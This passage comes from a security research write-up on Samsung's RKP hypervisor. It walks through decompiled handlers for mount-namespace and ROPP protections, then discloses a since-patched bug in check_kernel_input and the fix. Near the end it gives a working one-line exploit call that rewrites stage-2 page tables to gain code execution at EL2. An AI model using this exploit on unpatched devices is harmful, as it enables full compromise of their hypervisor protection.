if (!vfsmnt || chk_invalid_ns(vfsmnt) || mount_point >= KDP_SB_MAX) {
uh_log('L', "rkp_kdp.c", 945, "Invalid source vfsmnt %lx %lx %lx\n", regs->x3, vfsmnt, mount_point);
return;
}
if (!art_sb) {
uh_log('L', "rkp_kdp.c", 956, "dst_sb is NULL %lx %lx %lx\n", regs->x2, 0, regs->x3);
return;
}
mnt_sb = *(vfsmnt + 8 * rkp_cred->SB_VFSMNT_OFFSET);
*art_sb = mnt_sb;
switch (mount_point) {
case KDP_SB_ROOTFS:
*rkp_cred->SB_ROOTFS = mnt_sb;
break;
case KDP_SB_ODM:
*rkp_cred->SB_ODM = mnt_sb;
break;
case KDP_SB_SYS:
*rkp_cred->SB_SYS = mnt_sb;
break;
case KDP_SB_VENDOR:
*rkp_cred->SB_VENDOR = mnt_sb;
break;
case KDP_SB_ART:
*rkp_cred->SB_ART = mnt_sb;
break;
}
}
rkp_ns_set_sys_vfsmnt
does the following:
chk_invalid_ns
to check if the struct vfsmount
is valid;mnt_sb
field of the struct vfsmount
:odm_sb
, rootfs_sb
, sys_sb
, vendor_sb
or art_sb
.rkp_cred
hypervisor structure to the same value;SB_ROOTFS
, SB_ODM
, SB_SYS
, SB_VENDOR
or SB_ART
.One last check enabled by the mount namespace protection is done in flush_old_exec
of fs/exec.c
. This function is called (amongst others) by load_elf_binary
, so this is likely to prevent the abuse of call_usermodehelper
as it has previously been used in a previous Samsung RKP bypass.
// from fs/exec.c
static int kdp_check_sb_mismatch(struct super_block *sb)
{
if(is_recovery || __check_verifiedboot) {
return 0;
}
if((sb != rootfs_sb) && (sb != sys_sb)
&& (sb != odm_sb) && (sb != vendor_sb) && (sb != art_sb)) {
return 1;
}
return 0;
}
static int invalid_drive(struct linux_binprm * bprm)
{
struct super_block *sb = NULL;
struct vfsmount *vfsmnt = NULL;
vfsmnt = bprm->file->f_path.mnt;
if(!vfsmnt ||
!rkp_ro_page((unsigned long)vfsmnt)) {
printk("\nInvalid Drive #%s# #%p#\n",bprm->filename, vfsmnt);
return 1;
}
sb = vfsmnt->mnt_sb;
if(kdp_check_sb_mismatch(sb)) {
printk("\n Superblock Mismatch #%s# vfsmnt #%p#sb #%p:%p:%p:%p:%p:%p#\n",
bprm->filename, vfsmnt, sb, rootfs_sb, sys_sb, odm_sb, vendor_sb, art_sb);
return 1;
}
return 0;
}
#define RKP_CRED_SYS_ID 1000
static int is_rkp_priv_task(void)
{
struct cred *cred = (struct cred *)current_cred();
if(cred->uid.val <= (uid_t)RKP_CRED_SYS_ID || cred->euid.val <= (uid_t)RKP_CRED_SYS_ID ||
cred->gid.val <= (gid_t)RKP_CRED_SYS_ID || cred->egid.val <= (gid_t)RKP_CRED_SYS_ID ){
return 1;
}
return 0;
}
int flush_old_exec(struct linux_binprm * bprm)
{
// ...
if(rkp_cred_enable &&
is_rkp_priv_task() &&
invalid_drive(bprm)) {
panic("\n KDP_NS_PROT: Illegal Execution of file #%s#\n", bprm->filename);
}
// ...
}
flush_old_exec
calls is_rkp_priv_task
to check if the task requesting execution of a binary is privileged (ID < 1000). If it is, it calls invalid_drive
the check the mount point from which is started the binary.
invalid_drive
checks if the mount point structure is protected by RKP (must be read-only). Then if the device is not running in recovery and is not unlocked, if checks if it is in the list of predefined paths.
If you remember the first section, ROPP is only enabled for high-end Snapdragon devices. So for this subsection we will be looking at the kernel source code and RKP binary for a Snapdragon device.
rkp_cmd_jopp_init
and rkp_cmd_ropp_init
are probably called by S-Boot/the bootloader.
int64_t rkp_cmd_jopp_init() {
uh_log('L', "rkp.c", 502, "CFP JOPP Enabled");
return 0;
}
int64_t rkp_cmd_ropp_init(saved_regs_t* regs) {
// ...
something = virt_to_phys_el1(regs->x2);
if (*something == 0x4A4C4955) {
memcpy(0xB0240020, something, 80);
if (MEMORY[0x80001000] == 0xCDEFCDEF)
memcpy(0x80001020, something, 80);
uh_log('L', "rkp.c", 529, "CFP ROPP Enabled");
} else {
uh_log('W', "rkp.c", 515, "RKP_e08bc280");
}
return 0;
}
rkp_cmd_jopp_init
is does nothing. rkp_cmd_ropp_init
check if the structure it was given as argument starts with the magic value it expects (0x4A4C4955). If it does, it copies it to 0xB0240020. If the memory at 0x80001000 matches another magic value (0xCDEFCDEF), it copies the structure content to 0x80001020 too.
rkp_cmd_ropp_save
is probably called by S-Boot/the bootloader, while rkp_cmd_ropp_reload
is called by the kernel in __secondary_switched
of arch/arm64/kernel/head.S
(booting a secondary core).
// from arch/arm64/include/asm/rkp_cfp.h
/*
* secondary core will start a forked thread, so rrk is already enc'ed
* so only need to reload the master key and thread key
*/
.macro ropp_secondary_init ti
reset_sysreg
//load master key from rkp
ropp_load_mk
//load thread key
ropp_load_key \ti
.endm
.macro ropp_load_mk
#ifdef CONFIG_UH
push x0, x1
push x2, x3
push x4, x5
mov x1, #0x10 //RKP_ROPP_RELOAD
mov x0, #0xc002 //UH_APP_RKP
movk x0, #0xc300, lsl #16
smc #0x0
pop x4, x5
pop x2, x3
pop x0, x1
#else
push x0, x1
ldr x0, = ropp_master_key
ldr x0, [x0]
msr RRMK, x0
pop x0, x1
#endif
.endm
// from arch/arm64/kernel/head.S
__secondary_switched:
// ...
ropp_secondary_init x2
// ...
ENDPROC(__secondary_switched)
int64_t rkp_cmd_ropp_save() {
return 0;
}
int64_t rkp_cmd_ropp_reload() {
set_dbgbvr5_el1(MEMORY[0xB0240028]);
return 0;
}
rkp_cmd_ropp_save
does nothing and rkp_cmd_ropp_reload
simply sets the DBGBVR5_EL1
(the system register that holds the RRMK - the "master key") to the value at 0xB0240028.
In the section, we are going to reveal a now-fixed vulnerability that allows getting code execution at EL2. We will exploit this vulnerability on our Exynos device, but it should also work on Snapdragon devices.
Here is some information about the binaries that we are looking at:
A515FXXU3BTF4
Feb 27 2020
G973USQU4ETH7
Feb 25 2020
There are 2 important functions that you might notice we haven't detailed yet: uh_log
and rkp_get_pa
.
int64_t uh_log(char level, const char* filename, uint32_t linenum, const char* message, ...) {
// ...
// ...
if (level == 'D')
uh_panic();
return res;
}
uh_log
does some fairly standard string formatting and printing, but it also does more than that. If the log level that was given as the first argument is 'D'
, then it also calls uh_panic
. This will become important in a moment.
Now let's look at rkp_get_pa
(called in of a lot of command handlers to verify kernel input):
int64_t rkp_get_pa(uint64_t vaddr) {
// ...
if (!vaddr)
return 0;
if (vaddr < 0xFFFFFFC000000000) {
paddr = virt_to_phys_el1(vaddr);
if (!paddr) {
if ((vaddr & 0x4000000000) != 0)
paddr = PHYS_OFFSET + (vaddr & 0x3FFFFFFFFF);
else
paddr = vaddr - KIMAGE_VOFFSET;
}
} else {
paddr = PHYS_OFFSET + (vaddr & 0x3FFFFFFFFF);
}
check_kernel_input(paddr);
return paddr;
}
If the address is not in the fixmap region, it will call virt_to_phys_el1
. It the translation doesn't succeed, it calculates it from the KIMAGE_VOFFSET
. Otherwise, if the address is in the fixmap region, it calculates it from the PHYS_OFFSET
. Finally, it calls check_kernel_input
that will check if this address can be used.
int64_t virt_to_phys_el1(int64_t vaddr) {
// ...
if (vaddr) {
at_s12e1r(vaddr);
par_el1 = get_par_el1();
if ((par_el1 & 1) != 0) {
at_s12e1w(vaddr);
par_el1 = get_par_el1();
}
if ((par_el1 & 1) != 0) {
if ((get_sctlr_el1() & 1) != 0) {
uh_log('W', "general.c", 128, "%s: wrong address %p", "virt_to_phys_el1", vaddr);
if (!has_printed_stack_contents) {
has_printed_stack_contents = 1;
print_stack_contents();
}
has_printed_stack_contents = 0;
}
vaddr = 0;
} else {
vaddr = par_el1 & 0xFFFFFFFFF000 | vaddr & 0xFFF;
}
}
return vaddr;
}
virt_to_phys_el1
uses the AT S12E1R
(stage 1 & 2 at EL1 read access) and AT S12E1W
(stage 1 & 2 at EL1 write access) to get the physical address. If it fails and the MMU is enabled, it will print the stack contents.
int64_t check_kernel_input(uint64_t paddr) {
// ...
res = memlist_contains_addr(&protected_ranges, paddr);
if (res)
res = uh_log('L', "pa_restrict.c", 94, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
return res;
}
check_kernel_input
checks if the physical address in contained in the protected_ranges
memlist which, if you recall the previous sections, contains:
pa_restrict_init
physmap
added in init_cmd_initialize_dynamic_heap
So it checks if we're trying to give an address in uH memory. But if the check fails, it calls uh_log
with 'L'
as the first argument. uh_log
will return and execution will continue like nothing ever happened. The impact of this simple mistake is huge: we can give addresses inside hypervisor memory to all command handlers.
Exploiting this vulnerability is as simple as calling one of the command handlers with the right arguments. For example, we can use the command #5 (named RKP_CMD_WRITE_PGT3
), which calls the rkp_l3pgt_write
function that we have seen earlier. Now it is only a matter a finding what to write and where.
In our one-liner exploit, we are targeting the stage 2 page tables and adding a Level 2 block descriptor spanning over the hypervisor memory. By setting the S2AP
bit to 0b11, the memory region is now writable, and because the WXN
bit set in s1_enable
only applies to the AT at EL2, we can freely modify the hypervisor code.
Here is the exploit in its full glory:
uh_call(UH_APP_RKP, RKP_CMD_WRITE_PGT3, 0xffffffc00702a1c0, 0x870004fd);
We noticed that binaries built after May 27 2020
include a patch for this vulnerability, but we don't know whether it was privately disclosed or found internally. It affected devices with Exynos and Snapdragon chipsets.
Let's take a look at latest firmware update available for our research device to see what the changes are.
int64_t check_kernel_input(uint64_t paddr) {
// ...
res = memlist_contains_addr(&protected_ranges, paddr);
if (res) {
uh_log('L', "pa_restrict.c", 94, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
uh_log('D', "pa_restrict.c", 96, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
}
return res;
}
Interesting, instead of simply changing the log level, they duplicated the call uh_log
. Weird, but at least it does the job. We also noticed that they added some extra checks in rkp_get_pa
(better be safe than sorry!):
int64_t rkp_get_pa(uint64_t vaddr) {
// ...
if (!vaddr)
return 0;
if (vaddr < 0xFFFFFFC000000000) {
paddr = virt_to_phys_el1(vaddr);
if (!paddr) {
if ((vaddr & 0x4000000000) != 0)
paddr = PHYS_OFFSET + (vaddr & 0x3FFFFFFFFF);
else
paddr = vaddr - KIMAGE_VOFFSET;
}
} else {
paddr = PHYS_OFFSET + (vaddr & 0x3FFFFFFFFF);
}
check_kernel_input(paddr);
if (!memlist_contains_addr(&uh_state.dynamic_regions, paddr)) {
uh_log('L', "rkp_paging.c", 70, "RKP_68592c58 %lx", paddr);
uh_log('D', "rkp_paging.c", 71, "RKP_68592c58 %lx", paddr);
}
return paddr;
}
Let's recap the various protections offered by Samsung RKP:
.rodata
region (read-only);cred
, task_security_struct
, vfsmount
) are allocated on read-only pages because of the modifications made by Samsung to the SLUB allocator;cred
field of a task_struct
With this deep dive into RKP, we have seen that a security hypervisor can help against kernel exploitation, like other defense in depth mechanisms, by making the task harder for an attacker having gained read-write in the kernel. But this great engineering work doesn't prevent making mistakes in the implementation.
There are a lot more things about RKP that we did not mention here but that would deserve a follow up blog post: unpatched vulnerabilities that we cannot talk about yet, explaining in more detail the differences between Exynos and Snapdragon implementations, digging into the new framework and features of the S20, etc.